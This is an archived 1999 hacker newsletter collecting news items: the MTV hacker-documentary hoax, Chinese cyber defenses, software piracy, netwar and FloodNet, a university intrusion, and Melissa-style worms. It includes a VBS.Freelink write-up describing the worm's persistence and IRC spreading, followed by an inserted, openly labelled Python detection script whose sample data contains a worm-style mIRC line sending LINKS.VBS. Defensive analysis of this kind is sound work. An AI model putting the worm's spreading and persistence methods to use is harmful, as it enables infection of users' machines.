The much hyped and much talked about show on MTV, "True Life: I'm a hacker", is exposed for the media circus it was. Shamrock, from the weekly 'underground' web-tv news show PARSE (linked to from our site and viewable at http://www.biztechtv.com/parse), explains in a statement how he took the folks from MTV for a ride and helped perpetrate the myth presented by MTV that all hackers are drug taking criminals. It should be noted that Shamrock could use a spell (and grammar) checker in his otherwise interesting comments on the whole fiasco. - Ed

From HNN http://www.hackernews.com/

contributed by Shamrock

The recent MTV special "True Life: I'm a Hacker" has caused quite a stir in the underground community. Now it seems that most of what was aired was just made up fiction anyway.
A statement received by HNN from Shamrock, one of the people profiled in the show, alleges that a good chunk of the show was a farce put on by him to see just how gullible MTV was. (We aren't sure what to make of this. Is this the ultimate media hack or a childish prank that makes us all look bad? And why no verification by MTV?)

Statement From Shamrock
http://www.hackernews.com/orig/shamrock.html

Comments About the Show From HNN Readers
http://www.hackernews.com/orig/mtv.html

True Life: I'm a Hacker
http://www.mtv.com/mtv/tubescan/truelife/

Shamrock's statement;
~~~~~~~~~~~~~~~~~~~~

The following statement was received by HNN from Shamrock in regards to the MTV television special True Life: I'm a Hacker.

Well, first I'd like to apologize to the hacker community for giving MTV viewers a bad impression of what hacking is about. No doubt this fiasco has taught you all what you should've already known: MTV and the media are completely full of shit. They don't care about giving an accurate depiction of what's happening in the world. Remember this is "television programming". They care only about sensationalism and soft drink advertising.

I also owe the hacker community an explanation for what you saw on the show. There was mention in one of the HNN responses about "MTV was looking for someone gullible enough...." and that's what I assumed from the beginning, but I thought "could they be gullible enough themselves to actually air and credit themselves to the production of something like that?". I thought if they could, would there be any way that they would still be able to maintain credibility as journalists? I didn't think so. I also didn't think that when they asked if we could show them what types of crime take place in the hacker world that they would actually expect to see that. I also didn't think that they would take anything we showed them seriously.
Upon our first meeting with MTV I told them about what kind of work we do at pseudo.com as far as web broadcasting goes and told them about other hacker related Internet resources they should check out. They were referred to 2600, HNN, Defcon and L0pht. With that left the way it was I figured that there would be no excuse for MTV not being able to produce an interesting special on hacker culture. Surprisingly (or not) they contacted us a few weeks later stating that they were not satisfied with what they had already gathered from other groups that had approached. They wanted more and at this point it becomes apparent that this wasn't being taken seriously (or if it was, they must be as gullible as they think we are).

So we decided to take them for a ride (NOTE: at this point it was understood what was at risk, we had no intention of making hackers look bad. We waited for months to see if they would be realistic and after it was obvious that they wouldn't we figured the only option would be to discredit them with as much fiction as possible). The question was how far would they go. We already had our cast of characters, next we needed our plot. After setting the mood and introducing the compelling focus of our adventure we wanted to give them a climax. Unfortunately, the part where we deliver the disk to the rival group and the police (which we had paid off) showed up and arrested our counterparts didn't make it into the MTV production. It's a shame too because we really wanted to see if we could actually get them to pay for and produce our own original presentation without them even knowing it. Sadly, our hoax didn't even come close to what we had intended.

All I can do is reiterate to you just how fake and hollow what you see on television is. After this experience I wonder where, if anywhere, truth lies in what we are told to watch, read and listen to. This is the obvious issue the hacker community needs to address.
If the nation's intellectual lowest common denominator (television/music/etc audiences) and the media that caters to them are successful using programming to shape what their opinions are and what behavior they should endorse, is this not the same problem that exists when our governments are utilizing technology as a means to control its population? If the media is knowingly skewing issues that are fact based to leave its audience with an unfounded impression of the truth, is it not the duty of those who know better to discredit the false source and to provide the audience with the rest of the facts? Isn't this similar to a situation where a government is developing or employing technology in a form that violates our rights to privacy and the public that is embracing it is unaware of what is really happening? Or high technology industries that capitalize on a public that pays for products or services that fall short of their claims?

I think it would be very hard for anyone with a brain to take MTV seriously now and I hope no one does. I also hope that now this leaves open the opportunity for a source to emerge that will be everything that the mainstream media isn't. I also hope this source encompasses everything that HNN, HNC and the other various hacker resources (which should've been featured in the first place) are about.

Oh yeah, you're also probably asking yourself what the fuck is this parsetv.com shit all about? Do you really think that we are some kind of "information security resource"? or "hacker culture outlet"? No. We're entertainment. We use the web as a form of free speech to do whatever the hell we want in an effort to entertain the people that watch us. Any issues related to the hacker community that we follow, we do so as an obligation to the web community as a whole.
If there is a vulnerability that exists we share it because it's probably in our viewers' best interest to know so; as far as learning more about it or getting further detail, all we can do is refer the audience to the proper source for that information. If an issue is brought up related to the laws and regulations that relate to the web, we feature it also due to the fact that it's in the best interest of all web users to know. We do not claim to be the "consultants" or "experts" that other people claim to be (and are in fact not, um JP).

My personal interest in computers and technology is just that, personal interest. I got interested in hacking and its culture because I wanted to learn more about it and its relation to the everyday world that non-hackers live in. Not everyone that reads 2600 or goes to Defcon does so because they want to be a hacker, or grow up to work in IT. Everyone has their own reasons. I think to many of you I represent a much bigger concern of yours and that's the growing number of non-hackers that have an interest in hacking but don't follow the traditional roles. Well get used to it because you can expect to see a lot more of that as the web grows. As the web becomes more and more assimilated in our everyday lives, there will be more and more people out there getting interested in hacking "FO ALL DA WRONG REASONS". All the hacker community can do about it is provide a responsible model for the ones who take it more seriously than others. The others will just become what they were to begin with, irrelevant to what hackers are really trying to do.

I wholeheartedly apologize to those offended. The issues that hackers are out there trying to address are some of the most important issues that face the country, but it seems that the wrong people are listening and the right people are not. There is no doubt that the messages hackers are trying to convey need to be heard by the rest of the country, just don't expect that to happen through mainstream media.
Mainstream media is content with keeping mainstream audiences ignorant, and without discrediting what the media is saying, the ignorant will continue to listen.

@HWA

11.0 China Fortifies Cyber Defenses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ir0nMaiden

[Translated from Chinese] The Ministry of Information Industry, Ministry of Public Security, and Ministry of State Security in Hong Kong issued a joint memorandum urging all state and private organizations to not connect internal computer systems to the world wide internet. This is in direct response to the threat of cyber attack from Taiwanese intruders. The Ministry of Information and Industry has also established the China Computer Network Security Management Center. Fearing that imported computers and software may contain security holes, Trojan Horses, or Backdoors, the ministry is also asking that the development of domestically-made computers and software systems be increased.

Hong Kong Ming Pao
http://www.mingpao.com/newspaper/ (Chinese)

@HWA

12.0 Amnesty Program for Pirated Software Fails Miserably
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

An amnesty program for pirated software, sponsored by Microsoft and Adobe, failed to get even one copy of pirated software. While several people went to the event for the free t-shirts and other goodies, not one person showed up with software they thought might have been pirated.

SF Gate
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/10/16/BU18704.DTL

S.F. Treasure Hunt for Pirated Software Flops
Rally for turn-ins fails to produce any of the illegal booty

Benny Evangelista, Chronicle Staff Writer
Saturday, October 16, 1999

Microsoft Corp. attorney Anne Murphy was hoping people who were using pirated software would drop on by Justin Herman Plaza to turn in their illegal booty.
But to perhaps nobody's surprise but her own, yesterday's mildly publicized "Ask If It Is Licensed" event did not draw one single repentant soul.

There were plenty of folks who came for the free T-shirts and free software. And at least one man was more concerned about a different sort of intergalactic fraud.

Maybe Microsoft should have called the event "Ask, But Don't Tell."

"We're disappointed," said Murphy, the chief anti-piracy enforcement official for the Redmond, Wash., software colossus. She said a similar event in San Diego drew about 40 computer sellers who wanted to see if their software was legit, and "the vast majority was counterfeit."

Microsoft and publishing software-maker Adobe Systems of San Jose sponsored the event to publicize how consumers can tell if their software was illegally copied and to evangelize about the evils of piracy. The companies weren't there to throw violators in the slammer but would have exchanged genuine software for illegal copies. Then the illegal programs would serve as evidence to hunt down the real perpetrators -- the people who actually copied and sold the software.

Piracy cost the California economy an estimated 18,000 jobs and $244 million in lost tax revenue in 1998. The estimated rate of illegal software installed statewide last year was about 29 percent, about eight percentage points higher than in 1997.

Software piracy includes both individuals and companies that make and distribute illegal copies of legal software and criminals who make and sell counterfeit software.

In a separate ceremony in Palo Alto, Gov. Gray Davis signed an executive order setting government policy for state agencies to use only legal copies of software. President Clinton signed a similar order covering federal agencies a year ago.

Yesterday, Microsoft also filed federal suits against four Northern California computer sellers, including one in Fremont. Microsoft has filed more than 160 similar suits nationwide in the past year.
The people who drifted by during the four-hour event mostly appeared to be workers enjoying the midday sun rather than software desperadoes. Passers-by interviewed agreed that using illegal software was bad, although only a few said they would actually walk up to Microsoft admitting their deed if they were. Some even ranked shoplifting a candy bar as a worse crime.

One 29-year-old accountant from Dublin happily admitted sharing his copy of Chessmaster 3000 with 10 friends.

"I bought it, and I can give it to my friends if I want," said the man, who didn't want to give out his name for fear Microsoft enforcers "would get bored one day and send their legal team after me."

Frank Chu, 39, of Oakland didn't care about software at all. He was trying to get in front of television cameras with a sign that read, "Impeach Clinton. 12 Galaxies Guiltied to A Techtronic Rocket Society."

"Clinton has freely committed treason against 12 galaxies," Chu explained.

Murphy hoped no one would take the free software given to a select few in the crowd and make copies.

"For someone to learn about piracy and then go out and negatively impact the California economy would be a little bit cheeky," Murphy said.

Australian tourist Quentin Chester said software piracy wasn't high on his list of concerns.

"In Australia, we don't tend to be fussed about this stuff," said Chester, 41. "Australians are pretty laid back."

@HWA

13.0 A New Look at InfoWar
~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by M0ney

Is Cyberwarfare about Denial of Service Attacks, web page defacements, and network break-ins? Or is it more about Information dissemination, media manipulation and good ole propaganda? The Zapatista guerrillas, fighting for their freedom in Mexico, use the Internet to their advantage but not in a way you might think.
Time
http://www.pathfinder.com/time/magazine/articles/0,3266,32558,00.html

TIME SPECIAL REPORT/THE COMMUNICATIONS REVOLUTION/LANGUAGES OF TECHNOLOGY
OCTOBER 11, 1999 VOL. 154 NO. 15

Wired For Warfare
Rebels and dissenters are using the power of the Net to harass and attack their more powerful foes

BY TIM MCGIRK/MEXICO CITY

In the Chiapas jungles of southern Mexico during the mid-1990s, Zapatista guerrillas--fighting for the rights of Mayan peasants--evolved a new method of conflict: "cyberwar." A mode of battle that involves the Internet and other forms of telecommunication, cyberwar, or Netwar, is employed with increasing frequency by rebels, terrorists and governments around the world. A Netwar can be pure propaganda, recognition that modern conflicts are won as much by capturing headlines as by capturing territory. But a Netwar can have more dangerous applications when computer viruses or electronic jamming are used to disable an enemy's defenses, as both Serb and NATO hackers proved in Kosovo by unleashing barrages of propaganda and attempting to bring down each others' telecommunications systems.

When they rebelled in 1994, the poorly armed Zapatistas were no match for the Mexican army in Chiapas. But their spokesman, Subcomandante Marcos, is an agile media manipulator. A renegade college professor who hides his face in a ski mask, Marcos titled his Ph.D. dissertation The Power of the Word. In the battle for public sympathy, he knows his laptop is a more effective weapon than an AK-47 Kalashnikov rifle. Using a network of universities, churches and non-governmental organizations (NGOs) in Mexico, the U.S. and Canada--all linked through the Internet--Marcos mobilized international pressure to make the government cease its assaults against the Zapatistas. When the Mexican army declared in December 1994 that it had surrounded the 12,000 rebels, Marcos dispatched news that the Zapatistas had slipped out of the trap and conquered dozens of villages.
It wasn't true, but according to cyberwar specialists the Zapatistas' disinformation campaign caused enough confusion to help touch off a run on the peso, plunging Mexico into recession.

The Zapatistas' tactics also attracted the attention of military strategists. The U.S. Army, for one, sponsored a 1998 study on the group's tactics by the Rand think-tank. "Marcos is not a computer geek," says John Arquilla, a defense information expert at the U.S. Naval Postgraduate School in Monterey and co-author of the Rand report The Zapatista Social Netwar in Mexico. "He's more committed to the idea of info revolution."

That revolution is spreading. These days missiles are not only tipped with warheads but with video cameras; television and radio deliver war news as it happens; and alleged eyewitness accounts of battles and massacres appear on the Internet, quickly finding their way into other media. What matters in today's combat, says Arquilla, "is whose story wins." Not surprising, then, that 12 of the 30 terrorist organizations identified by the U.S. State Department have their own websites. Armies are also entering this digital arena. Sweden's leading military college recently graduated several infowar specialists, and the American military academy West Point is expected to add cybercombat to its curriculum.

In Netwar, governments are often at a disadvantage against rebel groups or terrorists. Since they are hierarchies, governments are digital sitting ducks, easy prey for electronic attacks. Groups like the Zapatistas and Burmese dissidents fighting the military regime in Rangoon, on the other hand, use swarms of loosely organized "hacktivists" to strike at governmental computer networks. The hackers strike, then swiftly disperse into cyberspace. The rebels' electronic battle station is seldom inside the country they are targeting, and tracing it back through the Net can be like trying to find the door in a hall of mirrors.
The Zapatistas' first websites, for example, were based in the U.S., while Colombia's Revolutionary Armed Forces (FARC) guerrillas are in Europe, and Serb Net propagandists relied on sympathizers in Eastern Europe during the Kosovo crisis.

One of the most novel weapons in the Zapatistas' digital arsenal is the Electronic Disturbance Theater, which operates out of New York City. These Net activists specialize in virtual sit-ins. Using a JavaScript tool called FloodNet, the group organizes thousands of online protesters to invade a Mexican government website with up to 600,000 hits a minute, normally bringing it to a grinding halt. "We're not into blowing people up or hacking sites," says one of the Theater's founders, Ricardo Dominguez. "We just want to create a small force field that will disturb the pace of power." He predicts that soon peasant farmers in Chiapas will be able to protect themselves from assaults by security forces with "wireless video uploads" that can secretly record incidents of police or army brutality and transmit live on the Internet. According to Dominguez, this would enable viewers to circulate the faces and badge numbers of assailants to human rights groups.

The art of Netwar is rapidly advancing. Cyberwar is "in its early stages," says the U.S. Naval Postgraduate School's Arquilla, "but it's the harbinger of a new kind of warfare." According to Dorothy Denning, a professor of computer science at Georgetown University, the Kosovo conflict was "the first war fought on the Internet." Air strikes targeted television and radio stations controlled by the Serbs, but NATO deliberately spared the four Internet servers in Yugoslavia from its bombardments. The aim was to let Yugoslavs tap into news on the conflict free from Serb censorship. But this ploy backfired. The Yugoslav government seized control of the servers and used them to pour out pro-Serb propaganda. Their aim, nearly successful, was to weaken the resolve of NATO countries.
No challenge to NATO's domination of the skies, the Serbs held their own in the Internet trenches. Serb hackers also used the servers and satellite links left intact by NATO to break into government and industry computers belonging to members of the alliance, disrupting services and defacing websites. NATO hackers did the same to Serb sites. Serb computer experts also lobbed "e-mail bombs" at U.S. government facilities, clogging the systems.

Digital sabotage is rife in Asia, too. In the week after the results of East Timor's referendum on independence were announced, the Department of Foreign Affairs received hundreds of e-mail "letter bombs" designed to disable government computers. "Without a firewall, [the e-mail] would have contaminated the system," says a source within the department. In Taiwan and China, supporters and opponents of Taiwan's bid for statehood regularly hack into and deface each other's websites.

Some Netwar experts concede the limitations of this kind of combat. Jamming governmental websites may be a nuisance to the Mexicans, for example, but it is unlikely to scare the administration into surrendering to the Zapatistas. Nevertheless, argues Georgetown's Denning, "An electronic petition with a million signatures may influence policy more than an attack that disrupts emergency services." Others, like Zapatista activist Dominguez, view cyberwar as a more civilized alternative to blood-and-guts fighting. "I'd much rather see extremists take down an Internet server than go around killing people," he says.

For the Zapatistas, fighting a Netwar may have saved them from extermination, winning the rebels widespread international support. Marcos often compares himself to the cartoon character Speedy Gonzalez. Like this quick-witted mouse, Marcos used the Internet to run rings around his bigger foes. His comrades in other countries may well follow his lead.
--WITH REPORTING BY JASON TEDJASUKMANA/JAKARTA

@HWA

14.0 Another Security Challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon

The Shanghai Waigaoqiao Free Trade Zone Network Development Co. is offering a whopping $600 (5,000 yuan) to anyone who can defeat the security of its website within the next week. (I hope companies aren't thinking that this sort of thing will actually test anything.)

Reuters- (Url outdated)

@HWA

15.0 University Shutdown After Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Wittenberg University in Columbus OH, had to completely shut down their web and email system after an electronic break in. During the shutdown the school installed various security improvements that make it harder for off-campus students to use the school's e-mail. The alleged attack occurred Sept. 12 and was traced to Australia.

Associated Press- via Cleveland Plain Dealer
http://www.cleveland.com/news/pdnews/metro/oa17hac.ssf

Hackers force college to close Web, e-mail servers

Monday, October 18, 1999

By ANDREW WELSH-HUGGINS
ASSOCIATED PRESS

COLUMBUS - Hackers who invaded Wittenberg University's computers last month forced the institution to shut down its e-mail system and Web site. Their attack also resulted in security improvements that make it harder for off-campus students to use the school's e-mail.

University President Baird Tipson said the attack occurred Sept. 12 and was traced to Australia. The hackers also struck at least three other Ohio colleges in the same assault.

"The major cost has been enormous amounts of our computing staff time that we desperately needed," Tipson said. "We're all trying to make sure we're Y2K compliant. We believe that we are now, but we wouldn't have taken two or three weeks of their time to spend on this project."
Tipson revealed details of the attack as he testified before lawmakers about the need for using part of Ohio's $10.1 billion tobacco settlement to pay for more technology for colleges.

Wittenberg, with 2,060 students, is a private liberal arts university in Springfield.

Joe Deck, director of computing services at Wittenberg, said the attack occurred just before noon on a Sunday. He said several employees of his department were working on Y2K compliance systems and noticed intruders in the system after about 10 minutes. They immediately shut down the university's Web and e-mail servers and isolated Wittenberg's connection to the Internet.

Deck said the hackers' expertise was "very well organized" and said he chose not to let them stay in the system longer, even though that might have increased the chance of identifying the culprits.

Since then, university employees have spent at least 2,000 hours rebuilding passwords, improving the software "firewall" that protects the system and putting other security precautions into effect. From users' perspective, things are back to normal, although work on internal systems still needs to be done, Deck said.

Deck, Tipson and other officials would not identify the other three Ohio colleges attacked. Tipson said the work Wittenberg did in reaction to the attack cost in the "low six figures."

Economics Professor Jeff Ankrom said he uses the Internet extensively in his classes. For about two weeks, "I felt almost immobilized," Ankrom said. "My Web site for classes was frozen in time, and I found myself being locked into the old mode of doing things, making announcements in class, handing out slips of paper, worrying about who got them, who didn't."

Wittenberg junior Ethan Grefe said the situation was a serious problem for off-campus students, since they weren't able to access their e-mail for several days.

"At first, I think the general atmosphere was one of astonishment, that somebody from Australia came and hacked into our system.
It was just kind of weird," said the 20-year-old from Toledo. "As it went on for a couple of weeks, people were getting pretty aggravated."

16.0 More Melissa Strains
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Melissa.U, Melissa.V, and VBS.Freelink are new Melissa strains that are spreading across the internet. While this article doesn't provide any new information it does give some background as to what has been going on in the AV world recently.

Yahoo News
http://dailynews.yahoo.com/h/zd/19991016/tc/19991016310.html

Saturday October 16 03:36 PM EDT

Melissa-like viruses haunt firms
Robert Lemos, ZDNet

Spiritual descendants of the Melissa computer virus have appeared over the last month, haunting at least 10 companies, according to anti-virus firms.

Recently, two variants of the Melissa virus -- Melissa.U and Melissa.V -- and VBS.Freelink, a Visual Basic script virus with a Melissa-like MO, have been infecting the unprepared.

Just ask Design Continuum Inc., a West Newton, Mass.-based industrial design firm that spent 40 man-hours cleaning up after a recent virus outbreak.

Two weeks ago, Tim Cronin, Design Continuum's director of business development, received an e-mail from a client with the subject line "Check this." Without thinking, Cronin opened the attachment, which was infected with VBS.Freelink.

"Within 45 minutes, I looked back at my screen and saw 60 messages from outside sources asking what had I done, and my IS (information systems) manager was on the phone asking me what had happened," Cronin told ZDNN in an interview.

VBS.Freelink is a relatively benign virus that spreads quickly, but does not damage data. Still, in spreading, the virus can create quite a bit of carnage, said Cronin. By the time he realized what had happened, all 85 of the firm's employees had received the attachment and enough had opened the e-mail that the company's servers quickly filled to overflowing, rejecting incoming messages.

"We invested at least a man-week in cleaning it up (over four days)," he said.

E-mailed from trusted source

Design Continuum -- and its unnamed clients -- had fallen victim to the trick that made Melissa so virulent: its packaging.

"I received the original e-mail from a source that I recognized as my client, so I felt trusting enough to open (the attachment)," he said.

In fact, the social engineering was so good that, when several recipients' anti-virus software deleted the infected mail, they wrote back to Cronin, asking him to re-send the document.

"There is a good bet that I would have been immune as well if I had updated my anti-virus suite," he said.

Lull between storms?

Design Continuum seems to be in the minority, however. Overall, companies and home users alike seem to have taken to heart the lessons of Melissa: Be suspicious of all attachments and regularly update your anti-virus software.

"The shock value of Melissa was good for education," said Chengi "Jimmy" Kuo, director of anti-virus research for security software firm Network Associates Inc. "Corporations are much more attuned to e-mail-based viruses. Anytime they hear about a virus, they want to know about it and get a cure immediately."

Anti-virus firm and NAI rival Trend Micro Inc. reported only six companies infected with the Melissa variants in the past week; four others have been hit with Freelink.

"We are just in the 'Variations on a Theme' period right now," said Susan Orbuch, director of communications for Trend Micro.

The anti-virus firms regard the past few months as a lull between storms. "It takes a while for virus writers to come out with something new," said NAI's Kuo. "Most viruses are by virus writers who have taken the code and tweaked it."

While a "tweaked" computer virus may not be identified by anti-virus software due to its different fingerprint, all major anti-virus software also has heuristics to pick out modified viruses.

"The recent viruses are nastier (more destructive) than Melissa," said Trend Micro's Orbuch, "but our heuristics are catching them because they are only variants -- they are not new."

Luck is a large factor as well. Anti-virus vendors who find out about a virus before it enters the wild can limit any damage and distribute new detection data -- known as "definitions" -- for their software.

Yet, while the current crop of code being generated by virus writers is not original, the anti-virus firms are worried that some virus writer will learn how to make a true e-mail virus -- one that does not require the user to act at all.

"There are techniques for attacking directly -- without needing the user to open an attachment," said NAI's Kuo. "Such (Melissa-like) viruses are not out of the picture yet."

-=-

VBS.Freelink

Aliases: Freelink, VBS.Freelink
Area of Infection: \Windows and \Windows\System folder
Likelihood: Common
Detected on: July 2, 1999
Characteristics: Trojan Horse, Worm

Description

VBS.Freelink is a virus discovered in July 1999. Symantec AntiVirus Research Center has recently been receiving an increase in VBS.Freelink virus reports from our customers. To protect yourself from this virus, all Norton AntiVirus customers should ensure their virus definitions are up to date by using the LiveUpdate feature.

In order to detect the VBS.Freelink virus, it is necessary to scan files with the VBS filename extension. It is recommended to use the options in NAV to scan "All files" rather than using the "Program Files" option. Please note that this may cause performance issues depending on the software, hardware and configurations you are using. Newer versions of Norton AntiVirus are shipped with scan "All files" as the default configuration. If you choose only to scan "Program Files", please make sure that the configuration in Norton AntiVirus includes the "VBS" file extension as well as the following file extensions in the "Scanner" and "AutoProtect" options.
Recommended Extension List as of Oct 5, 1999:

    386, ADT, BIN, CBT, CLA, COM, CPL, CSC, DLL, DOC, DOT, DRV, EXE, HTM, HTT, JS, MDB, MSO, OV?, POT, PPT, RTF, SCR, SHS, SYS, VBS, XL?

Technical Notes

VBS.Freelink is an encrypted worm that will work under Windows 98, Windows 2000 and all other versions of Windows that support the VB Scripting language. Once the worm is launched, it will use MS Outlook to automatically send an email with an attachment of itself. Similar to the Melissa virus, this worm uses MAPI calls to get user profiles from MS Outlook. The contents of the email generated by this worm are:

    Subject: Check this

    Have fun with these links.
    Bye.

When the attached file is executed, it will create the following two files:

    C:\WINDOWS\LINKS.VBS
    C:\WINDOWS\SYSTEM\RUNDLL.VBS

It will also create a file called LINKS.VBS in the root of all network drives that are currently mapped. Next, the worm will modify the following registry key so that it is executed every time the machine boots up:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Rundll=RUNDLL.VBS

After infecting a system, it will display a dialog box titled "Free XXX links" with the following content:

    This will add a shortcut to free XXX links on your desktop. Do you want to continue.

If the user selects Yes, it will create a shortcut pointing to an adult web site.

It also searches for the MIRC32.EXE and PIRCH98.EXE chat programs in C:\MIRC, C:\PIRCH98, C:\PROGRAM FILES and the subdirectories of each of these directories. If it finds either of these programs, it will modify the corresponding SCRIPT.INI or EVENTS.INI file located in the same directory. These INI files will cause LINKS.VBS to be sent to other people during IRC sessions.
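The behaviour catalogued above (the two dropped files, the copy in each mapped drive's root, the Run key entry, the altered mIRC/PIRCH scripts) maps directly onto a host-side check. The Python below is an added example, not part of the Symantec write-up or of any Symantec tool; it runs against a constructed snapshot of a host rather than a live registry, the F: drive is a made-up mapped drive, and the mIRC remote line in the sample is invented, since the write-up does not quote the worm's INI contents.

```python
"""Host-side check for the VBS.Freelink indicators in the write-up above.

Added example, not from the Symantec write-up or any Symantec tool. It runs
against a constructed snapshot of a host (Run key values, file paths and
IRC client INI contents) so it works offline; on a real Windows machine the
same functions would be fed from winreg, os.walk and the INI files.
"""
import re
from dataclasses import dataclass, field

# Indicators taken from the write-up.
FREELINK_FILES = {
    r"c:\windows\links.vbs",
    r"c:\windows\system\rundll.vbs",
}
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

# Generic heuristics: a Run entry that launches any .vbs, or an IRC client
# script that DCC-sends a .vbs to other users, is worth a look whatever the
# file is called (a "tweaked" variant would rename the files first).
VBS_RE = re.compile(r"\.vbs\b", re.IGNORECASE)
IRC_SEND_RE = re.compile(r"dcc\s+send\b.*\.vbs", re.IGNORECASE)
DRIVE_ROOT_LINKS_RE = re.compile(r"[a-z]:\\links\.vbs")


@dataclass
class HostSnapshot:
    run_values: dict                                  # Run value name -> command
    files: list                                       # full paths present on disk
    irc_scripts: dict = field(default_factory=dict)   # INI path -> contents


def check_run_key(run_values):
    hits = []
    for name, cmd in run_values.items():
        if name.lower() == "rundll" and cmd.lower().endswith("rundll.vbs"):
            hits.append(f"Freelink persistence: {RUN_KEY}\\{name}={cmd}")
        elif VBS_RE.search(cmd):
            hits.append(f"Run entry launches a script: {name}={cmd}")
    return hits


def check_files(files):
    hits = []
    for path in files:
        low = path.lower()
        if low in FREELINK_FILES:
            hits.append(f"Freelink dropper file: {path}")
        elif DRIVE_ROOT_LINKS_RE.fullmatch(low):
            hits.append(f"LINKS.VBS in drive root: {path}")   # mapped-drive copy
    return hits


def check_irc_scripts(irc_scripts):
    hits = []
    for path, text in irc_scripts.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            if IRC_SEND_RE.search(line):
                hits.append(f"{path}:{lineno} sends a .vbs over IRC: {line.strip()}")
    return hits


def scan(snapshot):
    """All indicators found on the host, one human-readable line each."""
    return (check_run_key(snapshot.run_values)
            + check_files(snapshot.files)
            + check_irc_scripts(snapshot.irc_scripts))


# Constructed infected-host snapshot. The Run value and the two dropped
# files are from the write-up; F: is a made-up mapped drive and the mIRC
# remote line is invented (the write-up does not quote the worm's INI text).
SAMPLE_HOST = HostSnapshot(
    run_values={"SystemTray": "SysTray.Exe", "Rundll": "RUNDLL.VBS"},
    files=[
        r"C:\WINDOWS\LINKS.VBS",
        r"C:\WINDOWS\SYSTEM\RUNDLL.VBS",
        r"F:\LINKS.VBS",
        r"C:\WINDOWS\NOTEPAD.EXE",
    ],
    irc_scripts={
        r"C:\MIRC\SCRIPT.INI":
            "[script]\nn0=on 1:JOIN:#:{ /dcc send $nick C:\\WINDOWS\\LINKS.VBS }\n",
    },
)

if __name__ == "__main__":
    for hit in scan(SAMPLE_HOST):
        print(hit)
```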
Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the following webpage:
http://www.symantec.com/avcenter/download.html

Write-up by: Abid Hussain Oonwala
October 5th, 1999

@HWA

17.0 Loyalty Cards are Not As Private As People Think
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench
Just how private is the information gathered by Customer Loyalty Cards? We're talking about those bar-coded cards that give shoppers at supermarkets and other stores up to a 15 percent discount in return for tracking what you buy. Supermarkets say that the data they gather is never sold or divulged to third parties. A search warrant is another matter. If an ex-spouse wants to discover whether you're a good parent they can subpoena the supermarket records. And no one really knows how secure these databases are.

Nando Times
http://www.techserver.com/noframes/story/0,2294,500046068-500075236-500169924-0,00.html

Privacy concerns leave customers wary of grocery cards

Copyright © 1999 Nando Media
Copyright © 1999 Scripps Howard News Service

From Time to Time: Nando's in-depth look at the 20th century

By MARY DEIBEL

ARLINGTON, Va. (October 16, 1999 1:43 a.m. EDT http://www.nandotimes.com) - Even though Safeway Club Card member Lois Diehl McDonley doesn't mind others knowing her shopping habits, she has a tip for those who do: Pay separately in cash for purchases you want kept private and use the discount card for the rest.

"It's your business if you don't want people knowing if you buy cigarettes, alcohol, certain reading materials or some other item, but those things don't usually get discounts anyway," says McDonley, a 57-year-old medical secretary and mother of two.
"Segregating your goods the way you do if you run an errand for a neighbor or need a receipt to be reimbursed at work not only protects your privacy, it messes up Big Brother's data base," she says. But Safeway says it doesn't sell or lease information about individual club card customers. "Privacy has never been an issue," says spokeswoman Karen Darnells from company headquarters in Pleasanton, Calif. "Club card members and their identities are kept strictly confidential" It's the same at other grocery chains that see the bar-coded rewards cards as a weapon in the battle for customer business in the $400-billion-a-year grocery wars: The cards typically carry discounts of 15 percent or more on specified goods in return for customers letting the stores build detailed personal profiles from their purchases. "We have an absolutely strict policy that we do not share that information with any third party," said Kroger spokesman Gary Rhodes. Kroger currently is the top-selling supermarket in the nation. However, Rhodes and spokesmen for other big markets, including No. 2 Albertson's, No. 3 Wal-Mart, No. 4 Safeway and No. 5 Ahold USA agree that information can and will be surrendered to law enforcement authorities armed with a court order. Nob Hill Foods in the San Francisco Bay area and Wild Oats natural food stores out of Boulder, Colo., did away with loyalty cards in response to customer surveys. Privacy experts say there's nothing to keep loyalty card data secret from a subpoena if someone is being sought in a criminal case or caught in a child custody fight. "You may innocently buy junk food, a pregnancy kit or over-the-counter sleeping aids, but how would it look if you decided to run for the school board or mayor 10 years from now?" says Judith DeCew, a Clark University professor and author of "In Pursuit of Privacy: Law, Ethics & the Rise of Technology" (Cornell University Press, 1997. 
"Whatever promises retailers make, nobody can be sure who has access to their data warehouses, and that goes for all kinds of stores, not just supermarkets," she says. "Internet e-tailers are especially aggressive when collecting data on customers: Look at how Amazon.com targets your book-buying and music interests, and consider that it's setting itself up as a worldwide virtual mall, and remember what was made of Monica Lewinsky's book purchases in the real world." California last week became the first state in the nation to limit the information that grocery stores can require as a condition for signing up for reward cards: A new state law stops stores from requiring would-be club card members to list driver's license or Social Security numbers. The statute also makes it illegal to rent or sell customer names, even though stores say they don't as a matter of policy. "Grocery shoppers will no longer have to risk their privacy to save a few dollars on grocery purchases," California state Sen. Jackie Speier, D-Daly City, says. So far, federal authorities have been slow to safeguard shoppers' privacy. What few steps they've taken include prohibitions on: - Release of video rental lists after Robert Bork's viewing preferences made it into press accounts in the midst of his failed 1987 Supreme Court bid. - Third-party interceptions of cell phone calls, which prompted a fine for a Florida couple who passed on a taped conversation in which Rep. John Boehner, R-Ohio, was overheard plotting strategy with fellow House Republican leaders during an attempted overthrow of then- House Speaker Newt Gingrich of Georgia. - Internet firms collecting personal data from youngsters. Anyone older than 14, however, presumably is old enough to check a Web site's privacy policy or look for labels such as those voluntarily adopted by the On-line Privacy Alliance, to which nearly 100 corporations and associations belong. 
